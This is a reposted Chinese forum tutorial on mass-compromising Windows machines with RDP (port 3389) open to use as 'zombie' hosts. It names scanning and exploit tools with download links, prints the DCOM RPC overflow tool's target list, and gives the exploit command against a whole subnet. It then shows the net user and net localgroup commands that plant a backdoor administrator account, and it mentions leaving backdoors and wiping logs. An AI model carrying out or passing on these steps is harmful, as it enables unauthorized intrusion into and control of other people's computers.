快速获得3389肉机这是我第一次写技术文章,不当之处还请大家指正。
记得从前看过一篇文章介绍如何快速获得3389肉机的文章,基本思路及步骤如下:先通过superscan等扫描端口的工具扫一段开启3389端口的主机,然后导出主机列表,再由x-scan扫描NT弱口令,配置强一点的字典,稍等一会儿,得到偌多弱口令,祭起终端连接,成功连接填入用户名就可以远程登陆控制了。留后门,删日志……
其实得到开启3389服务的主机列表后,我们完全可以利用当前危害最大的“dcomrpc漏洞”添加一个管理员帐号,再用这个帐号轻松地登陆到远程终端,达到图形化的完全控制。
用到的工具有:superscan、x-scanV2.3、还有一个新增的x-scan的插件DComRpc.xpn,专门用来扫描存在DComRpc漏洞的机器。可以到这里下载http://www.xfocus.net/tools/200307/DComRpc.xpn,把它放到x-scan下plugin目录下。x-scan便有了扫描DComRpc漏洞的功能。当然你也可以下载专用的扫描器。不过经本人测试,这个插件还是相当好用的。还有主角远程 DCOM RPC 缓冲区溢出工具点击这里下载http://81.heibai.net:81/download/show.php?id=3951。
要开工了。用superscan得到主机列表,save成文本文件修改为一行一个IP的格式,这个过程略过不说了。打开加入了插件的x-scan,扫描参数中选“从文件获取主机列表”,选取刚才保存的文件。在扫描模块中只选择最后一项,也就是刚加进去的插件,Dcomrpc溢出漏洞。开始扫描吧,你会发现几乎是所有的机器都存在这个好玩而简单的漏洞。现在该用xpdcomrpc了,先看一下帮助吧:
---------------------------------------------------------
- 远程 DCOM RPC 缓冲区溢出
- Original code by FlashSky and Benjurry
- Rewritten by HDM
- EXE 文件编译及修改:sagi http://www.hackerxfiles.net
- Usage: xp
- Targets:
- 0 Windows 2000 SP0 (english)
- 1 Windows 2000 SP0 (english2)
- 2 Windows 2000 SP1 (english)
- 3 Windows 2000 SP2 (english)
- 4 Windows 2000 SP2 (english2)
- 5 Windows 2000 SP3 (english)
- 6 Windows 2000 SP3 (english2)
- 7 Windows 2000 SP3 (english3)
- 8 Windows 2000 SP4 (english)
- 9 Windows XP SP0 (english)
- 10 Windows XP SP1 (english)
- 11 Windows XP SP1 (english2)
- 12 Windows XP SP2 (english)
- 13 Windows 2000 SP3 (chinese)
- 14 Windows 2000 SP4 (chinese)
- 15 Windows XP SP0 (chinese)
- 16 Windows XP SP1 (chinese)
- 17 Windows 2000 SP0 (japanese)
- 18 Windows 2000 SP1 (japanese)
- 19 Windows 2000 SP2 (japanese)
- 20 Windows 2000 SP0-1 (big5)
- 21 Windows 2000 SP3 (big5)
- 22 Windows 2000 SP4 (big5)
- 23 Windows XP SP0-1 (big5)
- 24 Windows 2000 SP0 (korean)
- 25 Windows 2000 SP1 (korean)
- 26 Windows 2000 SP2 (korean)
- 27 Windows 2000 SP4 (korean)
明白了吗?现在我们就可以这样了:
xp 13 192.168.1.*
一段提示过后,看到跳出的shell了吗?
c:\winnt\system32>
呵呵,到这一步,一切都好做了
c:\winnt\system32>net user admin hahaha /add
命令成功完成
c:\winnt\system32>net localgroup administrators admin /add
命令成功完成
好了,现在就可以用这个帐号admin进行3389远程控制了。
这种方法比较简单吧,要比起破解nt弱口令要主动一些,在此也是提出一种思路吧。从一开始的输入法漏洞开始,3389注定不能平安,愿大家都找到自己好用的肉机吧~
以上为转载~! :em03:
|